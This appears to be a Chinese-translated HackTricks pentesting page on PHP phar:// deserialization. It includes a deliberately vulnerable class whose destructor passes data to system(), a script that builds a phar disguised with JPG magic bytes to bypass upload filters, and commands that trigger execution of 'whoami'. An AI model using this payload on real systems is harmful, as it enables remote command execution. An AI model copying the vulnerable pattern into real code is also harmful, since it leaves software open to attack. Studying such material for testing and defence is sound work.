hacktricks/pentesting-web/file-inclusion/phar-deserialization.md

5.6 KiB
Raw Blame History

phar:// 反序列化

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

如果你对 黑客职业 感兴趣并且想要攻破不可攻破的东西 - 我们正在招聘!(需要流利的波兰语书写和口语能力)。

{% embed url="https://www.stmcyber.com/careers" %}

Phar 文件PHP 归档文件)文件以序列化格式包含元数据,因此,在解析时,此元数据将被反序列化,你可以尝试滥用 PHP 代码中的反序列化漏洞。

这个特性最好的一点是,即使使用不评估 PHP 代码的 PHP 函数(如 file_get_contents()、fopen()、file() 或 file_exists()、md5_file()、filemtime() 或 filesize()),这个反序列化也会发生。

所以,想象一下这样的情况,你可以使用 phar:// 协议使 PHP 网页获取任意文件的大小,并在代码中找到类似下面的类:

{% code title="vunl.php" %}

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path

{% endcode %}

您可以创建一个phar文件,当加载时,它将滥用这个类来执行任意命令,例如:

{% code title="create_phar.php" %}

<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

{% endcode %}

注意在phar文件的开头添加了JPG的魔术字节(\xff\xd8\xff),以绕过可能的文件上传****限制
使用以下命令编译test.phar文件:

php --define phar.readonly=0 create_phar.php

并利用有漏洞的代码执行whoami命令:

php vuln.php

参考资料

{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}

如果你对黑客职业感兴趣并想要攻破不可攻破的目标 - 我们正在招聘!(需要流利的波兰语书面和口语表达能力)。

{% embed url="https://www.stmcyber.com/careers" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥